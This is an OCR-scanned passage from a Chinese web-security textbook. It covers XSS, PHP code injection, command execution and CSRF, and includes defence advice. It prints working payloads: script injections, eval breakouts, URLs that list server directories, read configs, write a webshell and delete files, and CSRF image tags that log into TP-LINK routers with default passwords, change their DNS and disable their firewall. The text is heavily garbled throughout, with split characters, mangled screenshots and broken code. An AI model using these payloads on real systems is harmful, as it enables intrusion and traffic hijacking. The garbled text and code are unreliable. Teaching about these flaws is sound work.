从 基于 DOM 的 XSS 的 定义 及 其 触发 方式 发 现 , 当 基 于 DOM 的 XSS 跨 站 脚本 攻击 发 生 时 ， 
即使 恶意 数据 的 格式 与 传统 的 XSS 跨 站 脚本 攻击 数据 格式 有 一 定 差异 ， 也 可 以 在 不 经 过 服务 
器 端的 处 理 和 响应 的 情况 下 ， 直 接 对 客户 端 实施 攻击 行为 。 因 此 上 述 应 用 于 防范 反射 型 XSS 
和 存储 型 XSS 的 方法 并 不 适用 于 防范 基于 DOM 的 XSS 跨 站 脚本 攻击 。 

针对 基于 DOM 的 XSS 防 范 的 输入 检查 方法 ， 发 现在 客户 端 部 署 相应 的 安全 检测 代码 的 
过 滤 效 果 要 比 在 服务 器 端 检测 的 效果 更 加 明显 。 例 如 ， 可 以 通过 如 下 客户 端 检测 代码 来 保证 
用 户 输入 的 数据 只 包含 字母 、 数 字 和 空格 ， 代 码 如 下 : 

<script> 

var str = document.URL; 

str = str.substring(str.indexOf("name=")+9, str.length); 
str = unescape(str); 

var regex=/^([A-Za-z0-9+\s])*$/; 

if (regex.test(str)) 
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document.write(str); 
</script> 
同样 , 也 可 以 在 服务 端 实现 类 似 上 述 数据 检查 的 功能 , 如 在 服务 器 端 检 测 URL 参 数 是 否 
为 预定 参数 的 username, 并 对 username 参 数 的 内 容 进 行 检测 , 确认 数据 内 容 是 否 只 包含 数字 、 
字母 和 空格 符 ， 实 现 服务 端的 数据 过 滤 。 但 是 由 于 客户 端 数据 的 可 控 性 ， 这 种 服务 端 检测 的 
效果 要 明显 弱 于 客户 端 检测 。 
基于 DOM 的 XSS 输 出 检查 与 反射 型 XSS 漏 洞 输出 检查 的 方法 相似 ， 在 将 用 户 可 控 的 
DOM 数 据 内 容 插 入 DOM 节 点 之 前 ， 应 对 提交 的 数据 进行 HTML 编 码 处 理 ， 将 用 户 提交 的 数 
据 中 可 能 存在 的 各 种 危险 字符 和 表达 式 进行 过 滤 ， 并 以 安全 的 方式 插入 文档 中 进行 展现 , 例 
如 可 以 通过 如 下 函数 实现 在 客户 端 JavaScript 中 执行 HTML 编 码 处 理 。 
<script> 
function jsEncode(str) { 
var d = document.createElement('div'); 


d.appendChild(document.createTextNode(str)); 
return d.innerHTML; 





}: 
</script> 


2.2.4 ”操作 实践 
1. 反射 性 XSS 漏洞 


通过 前 面 的 分 析 我 们 知道 , 反射 性 漏洞 是 使 URL 内 容 出 现在 页 面 中 , 所 以 找到 一 个 搜索 
的 位 置 ， 在 这 个 位 置 通过 正常 的 搜索 是 没有 任何 问题 的 ， 注 意 看 如 图 2-24 所 示 的 URL 以 及 页 
面 反馈 显示 的 内 容 (http://permeate.localhost/home/search.php?keywords=test) 。 





< GC 合 吕 ” 闪 permeatelocalhost/home/search.php?keywords=test 


Permeate 图 


以 下 是 为 您 找到 的 符合 "test" 的 所 有 内 容 ! 


Permeate 轻松 渗透 测试 系统 v1.0 








图 2-24 ”搜索 test 关键 词 浏 览 器 界面 
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现在 来 尝试 在 URL 中 加 入 一 些 Script 代 码 ，http://permeate.localhost/home/search.php? 
keywords="><script>alert(123)</script> 中 的 代码 被 浏览 器 执行 了 ， 如 图 2-25 所 示 。 





@ OE htp://permeate.localhost/home/search.php?key 
Permeate 
* 首页 
* 注册 


LEE 


* 注册 
以 下 是 为 您 找到 的 符合 “>" 的 所 有 内 容 ! 





图 2-25 ”URL 中 的 代码 已 经 被 浏览 器 执行 
2. 存储 型 XSS 漏洞 


存储 型 XSS 是 永久 保留 的 ， 在 permeate 系 统 中 留意 发 帖 或 者 回帖 位 置 ， 可 以 看 到 帖子 标 
题 在 a 链接 中 ， 下 面 发 一 个 帖子 试 试 ， 如 图 2-26 所 示 。 


OD ha i + 












川 x 


CC permeatolocamnostyhome/inaexphpim-aealaarindexatbk 
Permeate Q 
帖子 标题 作者 回复 /查看 最 后 发 表 
测试 发 帖 一 下 子 哈哈 哈 admin 4/ 2017-07-13 15:53:14 

















图 2-26 分 析 标题 的 源码 结构 


根据 页 面 展示 的 标题 特征 构造 了 这 样 的 代码 : test</a><script>alert(123)</script>， 如 
图 2-27 所 示 。 
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日 

: 

区 

' 
0 
Mx 








图 2-27 构造 的 XSS 攻击 代码 
如 图 2-28 所 示 ， 青 次 打开 帖子 列表 页 面 出 现 弹 框 ， 说 明 已 经 成 功 插 入 恶意 脚本 。 


Er <“ 十 和 
X 怠 加 pemmestejocalhosthomejindexphpim=tjediBa=index&bk-5Bat-0 f 全 省 全 号 -vV% 
Penaste Mm permeate localhost 旦 示 站 a © a 
a 
甘 目 比 内 再 呈 二 对 活 生 . 
帖子 标 是 本 最 后 发 表 
测试 发 由 下 于 哈哈 哈 二 二 2017-07-13 155311 
test admin g 2017-0811140907 


天 页 “上 -页 “下 -页 ， 尾 页 总 共 1 页 本 页 2 条 总 共 2 条 区 3 


Permeate 轻松 湛 透 测 这 系统 v1.0 Archiver | 轻松 泪 透 系统 








图 2-28 存储 型 XSS 攻击 代码 被 执行 
2.2.5 ”代码 审查 


XSS 跨 站 注入 的 审查 主要 在 于 输入 输出 的 控制 ， 在 输入 审查 上 和 SQL 注入 有 些 类 似 ， 也 
需要 检查 接收 的 参数 是 否 转 义 ， 比 如 最 常用 的 htmlspecialchars() 函 数 ， 在 前 面 的 XSS 分 类 中 ， 
我 们 知道 XSS 是 根据 应 用 场景 来 分 类 的 ， 因 此 在 审查 XSS 漏 洞 时 对 业务 有 一 定 了 解 更 利于 代 
码 审 查 。 

根据 这 些 特 点 可 以 总 结 出 几 个 挖掘 方法 。 


(1) 数据 接收 位 置 ， 检 查 SGET、$POST、S$COOKIE 等 前 端 传递 的 数据 是 否 经 过 转 义 。 
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(2) 常见 的 反射 型 XSS 站 内 搜索 类 功能 发 现 次 数 较 多 。 
(3) 而 存储 型 在 文章 、 评 论 中 出 现 得 比较 多 。 

也 可 以 根据 以 下 3 个 分 类 来 做 审查 。 

多 反射 型 XSS 漏洞 发 生 的 范围 比较 广泛 ， 在 乌云 的 漏洞 案例 库 中 拥有 各 种 各 样 的 位 
置 ， 搜索 出 现 的 概率 很 大 。 

多 存储 型 XSS 可 以 根据 系统 类 型 来 找 ， 比 如 论坛 重点 关注 发 帖 、 回 帖 、 跟 帖 以 及 富 文 
本 编辑 器 新 闻 或 视频 网 站 ， 可 以 重点 关注 评论 ; 社交 网 站 可 以 关注 个 人 资料 页 面 ; 
企业 门户 站 则 关注 留言 、 人 才 招 聘 的 位 置 。 笼 统 地 说 ， 只 要 有 表单 的 地 方 都 有 可 能 
存在 存储 型 XSS 。 

e DOM 型 XSS 已 经 提 到 , 是 由 于 JavaScript 操作 DOM 元 素 引 起 的 编码 转换 问题 ， 所 
以 通常 要 关注 MVC 模式 中 的 VIEW 层 ， 查 看 VIEW 层 里 面 操作 的 DOM 用 户 是 否 
能 够 控制 。 


2.2.6 小结 


本 节 主 要 讲解 了 XSS 常 见 的 形式 以 及 攻击 者 利用 的 方式 ， 然 而 XSS 的 变种 类 型 还 有 很 
多 ， 但 万 变 不 离 其 宗 ， 开 发 者 要 做 的 就 是 在 输入 和 输出 的 地 方 做 好 控制 ， 对 其 前 端 传递 的 参 
数 进行 转 义 。 


当 攻击 者 提交 的 参数 被 当 作 代码 执行 的 时 候 ,， 我 们 称 之 为 代码 注入 漏洞 , 广义 上 的 代码 
注入 可 以 覆盖 大 半 安 全 漏洞 的 分 类 。 只 要 是 用 户 可 以 控制 的 “参数 ”， 被 当 作 “代码 ”注入 
程序 中 就 是 代码 注入 漏洞 。 

比如 ,SQL 注入 漏洞 实际 上 是 “参数 ” 被 当 作 SQL 语句 结构 注入 到 正常 SQL 语句 中 ，XSS 
漏洞 是 数据 被 当 作 JavaScript 代 码 注入 HTML 中 ， 本 节 主 要 介绍 狭义 上 的 代码 注入 漏洞 。 

狭义 的 代码 注入 通常 是 指 将 可 执行 代码 注入 当前 页 面 中 , 当 PHP 应 用 程序 本 身 过 滤 不 严 
格 时 ， 攻 击 者 可 以 通过 请 求 将 代码 注入 程序 中 执行 ， 类 似 于 SQL 注入 漏洞 ， 可 以 把 SQL 语句 
通过 网 页 注入 SQL 服务 执行 。 而 PHP 代 码 执行 漏洞 则 是 可 以 把 代码 注入 应 用 到 网 站 后 端 代码 
中 ， 如 果 漏 洞 没 有 特殊 的 过 滤 ， 就 相当 于 直接 有 一 个 Web 后 门 存在 ， 该 漏洞 主要 由 于 动态 代 
码 执行 函数 的 参数 过 滤 不 严格 导致 。 
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2.3.1 漏洞 类 型 


例如 PHP 的 eval 函 数 可 以 将 一 段 字 符 串 作 为 PHP 代 码 执 行 ， 当 用 户 能 够 控制 这 段 字 符 串 
时 ， 将 产生 代码 注入 漏洞 。 

PHP 中 能 造成 代码 注入 的 主要 函数 : eval preg_replace + /e 模 式 assert, 用 的 一 般 就 是 前 两 
者 ，CMS 中 很 少 用 到 assert， 至 于 一 些 偏 门 的 函数 在 代码 中 就 更 少 出 现 了 ， 倒 是 攻击 者 喜欢 
用 于 留 后 门 。 


1. 常规 eval 注入 


eval0 函 数 可 以 把 字符 串 按照 PHP 代 码 来 执行 ， 也 就 是 说 eval 可 以 动态 地 执行 PHP 代 码 ， 
代码 示例 如 下 : 


<2?php 

$data = $_GET['data']; 
eval(""\$ret = $data;"); 
echo $ret; 


当代 码 被 运行 时 ， 攻 击 者 可 以 通过 参数 值 来 运行 恶意 代码 ， 如 图 2-29 所 示 ， 参 数 中 的 
phpinfo0 已 经 被 执行 。 





BD phpinfo0 | 


€ GC 合 |© testlocalhost/index.php?data=phpinfo( 





Windows NT DESKTOP-GMO6USS 100b 
Aug 18 2016 11:34:28 
MSVC11 (Visual C+*+ 2012) 














图 2-29 phpinfo 已 经 被 执行 


上 面 的 代码 会 把 $data 在 运行 之 后 赋值 给 $ret， 如 果 $data 的 值 是 通过 参数 传 入 进来 的 ， 就 
可 能 会 发 生 代码 注入 漏洞 ， 但 是 通常 Sdata 不 会 直接 来 自 POST 或 GET 变 量 ， 因 为 大 部 分 开发 
人 员 都 会 有 一 些 安全 意识 。 


2. eval 单 引 号 包 于 


一 些 开发 者 或 许 知道 eval 可 能 存在 安全 风险 问题 ， 因 此 在 执行 时 会 用 单 引号 包 囊 变 量 来 
规避 安全 风险 ， 可 是 实际 情况 是 单 引号 并 不 能 规避 此 安全 问题 。 代 码 示例 如 下 : 
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<?php 

$data=$_GET['data]; 

echo "\$ret = '$data':"; 

eval("\$ret = strtolower('$data'):"); 














echo $ret; 
如 图 2-30 所 示 ，phpinfo0 依 然 被 执行 。 
DB phpmfof 
€ © 个 |© testlocalhost/ndex.phpidsta=%27):pnpniol: 
Sret = "Jphpinfo0V/ 
本 ET 
< 后 
Compiler MSVCIT Vical C+ + 2013 
ES 











图 2-30 phpinfo 被 执行 


开发 者 使 用 单 引 号 包 庄 变量 在 一 定 程度 上 提升 了 安全 性 , 但 是 依然 存在 安全 问题 。 如 图 
2-30 所 示 ， 攻 击 者 在 传 参 中 先 闭合 开发 者 的 单 引 号 ， 之 后 再 传 入 攻击 代码 ， 依 然 可 以 绕 过 开 
发 者 的 单 引 号 防护 。 (有 些 系统 开启 了 GPC=on， 攻 击 者 就 不 能 注入 代码 了 。) 


3. preg_replace /e 注入 


代码 示例 如 下 : 


<?php 

$data = $_GET['data']; 

echo $data; 

preg_replace('/<data>(.*)<Vdata>/e', '$ret="\1";', $data); 

echo $ret; 

在 以 往 的 漏洞 案例 中 ， 上 面 这 种 用 法 出 现 漏洞 的 情况 最 多 ， 是 因为 preg_replace 第 二 个 
参数 中 ,包裹 正则 匹配 结果 “\1” 的 是 双 引 号 ， 此 漏洞 在 PHP 7 以 下 版 本 存在 执行 任意 代码 
问题 ， 不 过 PHP 7 以 上 版 本 逐渐 废弃 该 方法 ， 因 此 不 做 过 多 讲解 。 如 图 2-31 所 示 ， 代 码 运 行 
后 ，PHP 提 醒 preg replace 函数 即将 废弃 。 


























00017 234792|maink ) 
O0017 235104|preg ‘eplace (} 





图 2-31 preg_replace 函数 废弃 提醒 
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2.2 
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4. 动态 调用 函数 
代码 示例 如 下 : 


<?php 


function zhangsan() 


echo 'zhangsan'; 


} 
function lisi() 


上 


echo 'lisi' 


} 


if (isset($_GET["fune"])) { 
$myfunc = $_GET["fune"]; 
echo $myfunc(); 


} 


在 上 面 的 代码 中 , 开发 者 本 意 是 通过 前 端 传 过 来 的 参数 调用 不 同 的 自 定义 函数 , 可 是 却 
没有 考虑 到 攻击 者 会 特意 避 开 其 自 定义 的 函数 而 调用 系统 内 部 的 函数 。 如 果 攻 击 者 访问 
URL: http://localhost/test3.php?func=phpinfo， 页 面 就 会 直接 调用 系统 函数 。 

如 图 2-32 所 示 ，phpinfo 已 经 被 执行 。 


ml 
B hn DS 
Ll 


System 





Windows NT DESKTOP-GMO6L5S 10.0 build 17046 (Windows 10) AWDG4 





Build Date 


pa 18 2016 11:34:28 





Compiler 


svel! (viseal cr 2012) 





Architecture 





Configure Command 

















图 2-32 phpinfo 被 执行 


漏洞 案例 


1. 伪造 IP 地 址 案例 


2014 年 2 
缺陷 编号 : 


月 ， 白 帽子 “lucky” 提 交 某 官方 网 站 的 远程 代码 执行 漏洞 。 
wooyun-2014-051962。 


在 访问 URL: http:/www.localhost.com/link/ 时 ， 如 果 在 字段 中 添加 X-Forwarded-Host 
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内 容 ， 并 把 内 容 设置 为 PHP 代码 ,就 会 触发 PHP 代码 注入 问题 。 例 如 下 面 的 HTTP 头 信息 ， 
在 该 字段 中 填 入 ";print(md5(acunetix_wvs_security_test));$a=” 内容: 


GET /link/ HTTP/1.1 
User-Agent: Mozilla/2.2.0 (Windows NT 2.3.1; WOW64) AppleWebKit/532.4.36 (KHTML, like 


Gecko) Chrome/22.5.0.1500.63 Safari/532.4.36 


示 ， 


X-Forwarded-Host: ";print(md5(acunetix_wvs_security tesb);$a=" 
Cookie: PHPSESSID=adtd1fi9torvrSprmakdljvbp3 

Host: www.locoy.com 

Connection: Keep-alive 

Accept-Encoding: gzip,deflate 

Accept: */* 


可 以 看 到 ， 后 端 已 经 运行 了 MD5 函数 ， 并 把 结果 通过 print 打印 了 出 来 。 如 图 2-33 所 
MD5 函数 已 经 被 攻击 者 成 功 触 发 ， 说 明 此 处 存在 代码 注入 漏洞 。 





37.36 (KETME, like Gecko) Chrcme128.0.1500.63 Safari/537.36 


Response Headers Response Data Vew Page | HTML Sucture Analyss 





63c19a6da79816b21429e5bb262daed363c19a6daT9316b21429e5bb262dasd863c19a6daT9816b21429e5bbh262daed863c19a6da79816b21429e5bb262daed863c] 


民 ”| 火车 采集 器 








图 2-33 ”后 端 运行 了 MD5 函数 
2. URL 参数 注入 案例 


2013 年 10 月 ， 白 帽子 “秋风 ”提交 漏洞 “ 某 站 存在 PHP 代码 注入 可 WebShell”。 
缺陷 编号 : wooyun-2013-040647。 


白 帽 子 “ 秋 风 ” 在 URL (http://tool.localhost.com/yb/yb.php?q=) 的 q 参数 中 发 现 了 代码 


注入 ， 但 是 在 利用 过 程 中 发 现 引号 无 法 使 用 ， 处 于 被 后 端 屏蔽 的 状态 ， 于 是 在 URL 中 添加 


了 一 


个 get 参数 4， 然 后 从 全 局 变量 $_GET 中 获取 d 参数 的 值 。 

下 面 是 当时 测试 的 一 些 记 录 。 

(1) 获取 整 站 目录 结构 

该 漏洞 可 以 通过 print_r($scandir($path)) 打 印 目录 及 文件 , 所 以 可 以 修改 参数 d 的 值 来 扫 


描 整 站 的 目录 结构 。 比 如 访问 如 图 2-34 所 示 的 URL， 在 页 面 中 可 以 看 到 返回 的 目录 名 称 。 
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URL 地 址 如 下 : 
http://tool.local.com/yb/yb.php?q=$ {(@exit(print_r(scandir($_GET[d])))}&d=../../../ 


[Stool stcto.com, =S{@exitlp a 
:MysQ. | 图 baidu 时 cooale code 二 PHP:PHP Manu..， 误 Coogle Translate 也 在 线 翻 译 在 线 .。 于 百度 在 线 翻译 M Gmail 站 乌云 集 市 |Woo... 
SETOcem sn i 5 


国 汪 工具 箱 





Aray (Bb]=> .11] = .P=> 51cto.com B]=> hc3icn [4] > pr95site 1[5] => suoyoo com [6] => suoyoo com 








图 2-34 返回 的 目录 名 称 











Array 

( 

[0] =>. 

[=> 

[2]=> 51cto.com 

DB] = hc3i.cn 

[4] => px95site t 

[5] => suoyoo.com 
[6] => suoyoo.com 2013-5-3 
[7] 一 tools 

[8] => watchstor.com 


) 

(2) 读 取 整 站 源 代码 

该 漏洞 可 以 通过 print_r(file(Spath)) 查看 文件 内 容 ， 所 以 自 帽子 可 以 修改 参数 d 的 值 读 
取 整 站 文件 内 容 。 例 如 下 面 的 URL: 


http://tool.localhost.com/yb/yb.php?q=$ {(@exit(print_r(file($_ GET[d])))}&d=../../../S1cto.co 
m/tool/config.php 


(3) 写 入 WebShell 

通过 函数 file_put_contents($path,$content) 可 以 写 入 文件 内 容 ， 如 果 白 帽子 把 内 容 写 为 一 
句 话 木 马 ， 那 么 服务 器 就 会 产生 对 应 的 木马 文件 。 

例如 下 面 的 示例 ， 参 数 d 为 内 容 ， 参 数 n 为 文件 名 ， 构 建 出 如 下 URL: 

http://tool.localhost.com/yb/yb.php?q=$ {(@exit(var_dump(file put contents($_ GET[n],$ G 
ET[d])))}&d=by:wooyun.org&n=./../wooyun.org.txt 

写 入 之 后 ， 找 到 对 应 的 文件 地 址 ， 访 问 文件 对 应 的 URL 地 址 ( 见 图 2-35) : 


http://tool.localhost.com/wooyun.org.txt 
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《 © 会 D tools1cto.com w 


矶 分 类 园 MysQL::MysQ.， 图 baidu 睛 Google = 


by:wooyun.org WWw.wooyun. or 

















图 2-35 访问 URL 地 址 
(4) 删除 文件 
在 PHP 中 可 以 使 用 函数 unlink($path) 删 除 一 个 文件 ， 因 此 当 构 造 出 下 面 的 URL 时 ， 可 
以 删除 刚才 参数 的 文件 ， 参 数 n 为 文件 名 : 
http://tool.localhost.com/yb/yb.php?q=$ {(@exit(var_dump(unlink($_GET[n])))}&n=./../wooy 


un.org.txt 
2.3.3 ”防御 方法 

1. 不 把 对 象 存储 为 字符 串 

在 某 些 场景 下 ， 开 发 者 需要 把 一 个 对 象 存储 到 一 个 文件 中 ， 这 时 候 正确 的 操作 是 使 用 
JSON 来 保持 对 象 ， 而 不 是 使 用 PHP 序 列 化 来 保存 ， 因 为 序列 化 的 数据 读 取 后 需要 使 用 eval 
才能 还 原 为 对 象 ， 这 无 疑 增加 了 代码 注入 的 安全 风险 。 

2. 谨慎 使 用 eval 

对 于 必须 使 用 eval 的 情况 ， 一 定 要 保证 用 户 不 能 轻易 接触 eval 的 参数 或 用 正则 严格 判 
断 输 入 的 数据 格式 ) 。 

对 于 字符 串 ， 一 定 要 使 用 单 引 号 包 庄 可 控 代 码 ， 并 在 插入 前 进行 addslashes: 

$data = addslashes($data); 

eval("\$data = deal('$data');"); 

3. 弃 用 preg_replace /e 修饰 符 

preg_replace /e 修 饰 符 使 preg_replace() 将 replacement 参数 当 作 PHP 代码 ， 很 多 攻击 者 
用 /e 修 饰 符 来 写 一 句 话 木马 ， 安 全 性 非常 差 。 可 以 换 用 preg_replace_callback 来 代替 /e 修 饰 符 ， 
在 PHP 5.5 版 本 开始 已 经 废弃 preg_replace e 修 饰 符 的 特性 ， 其 中 最 大 的 原因 就 是 安全 性 问题 。 


2.3.4 ”命令 执行 


在 应 用 需要 调用 一 些 外 部 程序 处 理 内 容 的 情况 下 , 就 会 用 到 一 些 执行 系统 命令 函数 。 例 
如 PHP 中 的 system、exec、shell_exec 等 ， 当 用 户 可 以 控制 命令 执行 函数 中 的 参数 时 ， 将 会 注 
入 恶意 系统 命令 到 正常 命令 中 ， 造 成 命令 执行 攻击 。 


二 
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1. 漏洞 成 因 

PHP 的 优点 有 很 多 ， 比 如 简洁 、 方 便 等 。 但 方便 开发 者 的 同时 也 伴随 着 一 些 问 题 ， 如 速 
度 慢 、 无 法 接触 系统 底层 ， 如 果 我 们 开发 的 应 用 需要 特殊 功能 ， 就 需要 调用 外 部 程序 ， 在 调 
用 程序 的 时 候 又 会 引发 安全 问题 ， 这 也 是 本 节 中 将 要 提 到 的 命令 执行 漏洞 。 

在 PHP 中 可 以 调用 外 部 程序 的 主要 有 以 下 函数 : 


System 
exec 

shell exec 
passthru 
popen 
Proc_popen 


除了 上 面 提 到 的 常用 函数 外 ， 还 有 一 些 比较 偏 门 的 函数 ， 这 些 偏 门 的 函数 主要 在 
WebShell 里 用 得 多 ， 实 际 上 在 正常 应 用 中 用 的 最 多 的 还 是 前 3 个 。 

应 用 在 调用 这 些 函 数 执行 系统 命令 的 时 候 , 如 果 将 用 户 的 输入 作为 系统 命令 的 参数 拼接 
到 命令 行 中 ， 又 没有 过 滤 用 户 的 输入 ， 就 会 造成 命令 执行 漏洞 。 

比如 商业 应 用 的 一 些 核心 代码 可 能 封装 在 二 进 制 文件 中 , 在 Web 应 用 中 通过 system 函 数 
来 调用 : 

system("/bin/program --arg $arg"); 


2. 命令 执行 示例 

先 来 看 一 个 简单 的 代码 命令 执行 例子 ， 代 码 中 system 会 执行 前 端 提 交 过 来 的 参数 : 

<?php 

$cmd=$_ GET[cmd']; 

System($cmd); 

现在 访问 文件 对 应 的 URL (http://localhost/index.php?cmd=dir) ， 并 在 其 参数 中 写 入 系 
统 命令 ，PHP 就 会 执行 相应 命令 ， 如 图 2-36 所 示 。 

在 绝 大 多 数 生产 环境 中 ,上 述 代码 是 不 会 出 现 的 , 因为 开发 者 的 基本 安全 意识 还 是 有 的 ， 
但 是 类 似 原理 的 代码 出 现 得 也 不 少 ， 而 此 处 的 代码 示例 主要 用 于 了 解 其 漏洞 原理 。 


3. 命令 执行 防御 
(1) 减少 命令 执行 ， 能 使 用 脚本 解决 的 工作 不 要 调用 其 他 程序 处 理 。 尽 量 少 用 执行 命 
令 的 函数 ， 并 在 disable_functions 中 禁用 。 
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2017/12/23 16:17 DIR. 
7/12/23 16:17 DIR. Ee 
7/10/22 11:08 147 .htaccess 
7/12/23 16:20 DIR. -idea 
7/12/23 16:17 42 222.php 
7/10/21 12:00 627 404. php 
7/05/02 10:45 6, 901 bugsl. php 
7/12/17 16:06 11, 608 bug_detail. php 
7/10/21 00:26 81 composer. json 
7/10/21 00:27 9, 094 composer. lock 
7/10/21 00:25 1, 852, 323 composer. phar 
2017/12/21 22:03 155 conn. php 
18| 2017/05/02 10:49 3, 795 contact. php 
19|2017/05/02 10:47 5, 185 corps. php 











图 2-36 PHP 执行 相应 的 命令 
(2) 如 果 参 数 是 由 用 户 所 提供 的 ， 需 要 使 用 escapeshellarg 函 数 进行 过 滤 。 
(3) 参数 的 值 尽量 使 用 引号 包 训 ， 并 在 拼接 前 调用 addslashes 进 行 转 义 。 
2.3.5 小结 


在 代码 注入 方面 , 大 部 分 漏洞 产生 的 原因 是 为 了 方便 开发 , 不 过 在 方便 的 同时 需要 注意 
把 参数 作为 代码 执行 的 安全 问题 。 


CSRF (Cross-Site Request Forgery， 跨 站 请 求 伪 造 ) 是 一 种 让 已 登录 用 户 在 毫 不 知情 的 
情况 下 操作 某 项 业务 。 虽 然 攻 击 者 能 发 起 请 求 ， 却 看 不 到 伪造 请 求 的 响应 结果 ， 所 以 CSRF 
攻击 主要 用 来 执行 数据 写 入 动作 ， 而 非 窃 取 用 户 数据 。 

当 受 害 者 是 一 个 普通 用 户 时 ，CSRF 可 以 实现 在 其 不 知情 的 情况 下 转移 用 户 资金 、 发 送 
邮件 等 操作 ; 但 是 如 果 受 害 者 是 一 个 具有 管理 员 权限 的 用 户 , CSRF 就 可 能 会 威胁 到 整个 Web 
系统 的 安全 。 


2.4.1 原理 分 析 


我 们 知道 ， 通 常 为 了 让 用 户 保持 登录 状态 ， 服 务 器 会 在 用 户 的 浏览 器 中 设置 Cookie 值 ， 
当 用 户 再 次 访问 的 时 候 会 把 这 个 Cookie 值 发 送 给 服务 器 ， 服 务 器 会 通过 Cookie 值 判断 是 否 已 
经 登录 ， 从 而 给 予 某 种 权限 。 攻 击 者 正 是 利用 这 一 特性 来 加 以 利用 ， 如 图 2-37 所 示 。 
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1. 游览 器 登录 信任 网 站 A 
信任 网 站 A 





2. 通过 验证 ， 在 游览 器 中 产生 
cookie 


半生 一 
5. 根 据 B 在 〔4) 的 请 求 ， 游 览 器 带 着 
《2) 产生 和 e 








3。 用户 在 没有 登 出 A 网 站 的 情况 
下 ， 访 问 危 险 网 站 日 





4. 6 要 求 访问 A 网 站 ， 请 求 发 出 一 个 攻击 者 日 


request 


一 一 





图 2-37 CSRF 攻击 原理 图 


一 些 开发 者 对 CSRF 漏 洞 了 解 不 足 ， 认 为 “经 过 登录 的 浏览 器 发 起 的 请 求 ” 就 是 “经 过 登 
录 的 用 户 发 起 的 请 求 ”， 当 已 登录 的 用 户 单 击 攻击 者 构造 的 恶意 链接 后 就 “被 ”执行 了 相应 的 
操作 。 比 如 ， 有 一 个 金融 网 站 的 转账 功能 (将 100 元 转 到 张 三 的 账 上 〉 是 通过 传 参 的 方式 实现 
的 : GET http://aaa.com/transfer.php?acct=zhangsan&amount=100， 当 攻击 者 张 三 诱 导 受 害 者 单 
击 该 链接 时 , 如 果 受 害 者 登录 该 银行 网 站 的 登录 信息 尚 还 没有 过 期 , 那么 受害 者 便 在 不 知情 的 
情况 下 转 给 了 攻击 者 张 三 100 000 元 钱 : http://aaa.com/transfer.php?acct=lisi&amount=100000， 
这 个 请 求 的 身份 验证 只 能 保证 请 求 来 自用 户 的 浏览 器 ， 却 不 能 保证 请 求 是 用 户 自愿 发 出 的 。 


2.4.2 ”漏洞 案例 
1. 路 由 器 管理 后 台 案 例 


2013 年 ， 网 络 上 出 现 了 一 种 大 规模 的 路 由 器 劫持 ， 被 劫持 的 原因 是 路 由 器 的 后 台 管 理 
系统 存在 CSRF 漏洞 且 存在 弱 口令 ， 在 当时 TP-LINK 路 由 器 应 该 是 市 场 上 占有 率 最 多 的 家 
用 路 由 器 ， 而 恰恰 这 个 市 场 占有 率 最 高 的 路 由 器 却 出 现 了 这 种 问题 。 

TP-LINK 路 由 器 有 一 个 管理 系统 , 虽然 使 用 HTTP 基础 认证 , 但 是 可 以 使 用 CSRF 方式 
来 绕 过 ， 攻 击 者 攻击 了 使 用 默认 密码 的 用 户 。 因 为 TP-LINK 路 由 器 内 所 有 操作 均 为 GET， 
只 需 一 个 标签 就 可 以 进行 攻击 。 

下 面 是 攻击 者 攻击 路 由 器 的 步骤 。 
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首先 攻击 者 需要 绕 过 基础 认证 ， 在 TP-LINK 路 由 器 中 ， 账 户 和 密码 均 默认 为 admin 并 
且 网 关 地 址 都 是 统一 的 192.168.1.1， 因 此 攻击 者 可 以 用 下 面 的 URL 来 获得 登录 认证 后 的 授 
权 信息 : 

<img src=http://admin:admin(@192.168.1.1></img> 


此 时 使 用 默认 密码 的 路 由 器 会 成 功 登 录 ， 路 由 器 会 分 配 一 个 正确 的 Cookie。 如 果 受 害 
者 修改 了 密码 ， 攻 击 者 也 可 以 使 用 暴力 破解 方法 加 载 多 个 img 标签 ， 包含 常见 的 密码 组 合 ， 
可 以 将 攻击 范围 扩大 。 如 果 拿 到 了 正确 的 Cookie， 就 可 以 开始 攻击 了 。 
由 于 路 由 器 内 所 有 的 操作 都 是 GET 请 求 , 因此 攻击 者 构造 下 面 的 URL 就 可 以 让 受害 者 
的 路 由 器 断 网 : 

<img src=http://192.161/userRpm/StatusRpm.htm?Disconnect= 断 线 &wan=0></img> 


断 网 对 受害 者 虽然 有 害 ， 却 也 很 难 让 攻击 者 得 到 好 处 ， 因 此 攻击 者 虽然 拥有 此 类 权限 ， 
但 却 很 少 去 做 。 通 常 攻击 者 会 利用 此 漏洞 在 路 由 器 中 添加 一 个 DNS 服务 器 地 址 ， 假 设 攻击 
者 服务 器 的 IP 地 址 为 211.22.43.21， 当 攻击 者 把 受害 者 路 由 器 的 DNS 设置 为 此 地 址 时 ， 受 
害 者 所 有 的 域名 解析 都 会 经 过 此 服务 器 ， 例 如 下 面 的 URL 地 址 可 以 设置 路 由 器 分 配 的 DNS 
服务 器 : 

<img src=http://192.161/userRpm/LanDhcpServerRpm.htm2dhcpserver=1l&ip1=192.16100&ip2= 


192.16199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=2.5.2.5.2.5.8&dnsserver2=0.0.0.0&Save= 
%B1%A3+%B4%E6></img> 


可 以 想到 ， 如 果 攻 击 者 把 这 个 地 址 设置 为 自己 服务 器 的 地 址 ， 并 且 拱 建 了 一 个 DNS 服 
务 器 ， 把 某 些 域名 指向 自己 的 计算 机 ， 那 么 受害 者 访问 网 页 所 带 的 Cookie 都 会 被 攻击 者 所 
劫持 。 

比如 受害 者 登录 了 QQ 空间 后 ， 攻 击 者 此 时 把 域名 解析 到 攻击 者 自己 的 计算 机 ， 受 害 者 
再 次 访问 QQ 空间 所 产生 的 数据 就 会 全 部 被 攻击 者 所 拿 到 ,也 就 可 以 登录 受害 者 的 QQ 空间 了 。 

比如 攻击 者 想 蹦 邻 居 的 WIFI, 但 是 邻居 路 由 器 中 设置 了 仅 限 某 些 IP 连接 ， 这 个 时 候 攻 
击 者 可 以 构造 一 条 URL， 通 过 关闭 邻居 路 由 器 的 防火 墙 来 突破 此 限制 ， 例 如 下 面 是 构造 出 
来 的 URL: 

<img src=http://192.161/userRpm/FireWallRpm.htm?IpRule=0&MacRule=0&Save= 
%B1%A3+%B4%E></img> 

虽然 构造 URL 的 方式 也 能 控制 整个 路 由 器 ， 但 是 攻击 者 或 许 并 不 满足 ， 觉 得 这 样 操作 
很 麻烦 ， 还 可 能 将 管理 平台 开放 给 外 网 访问 ， 然 后 直接 通过 浏览 器 操作 来 控制 路 由 器 : 


<img src=http://192.161/userRpm/ManageControlRpm.htm?port=80&ip= 
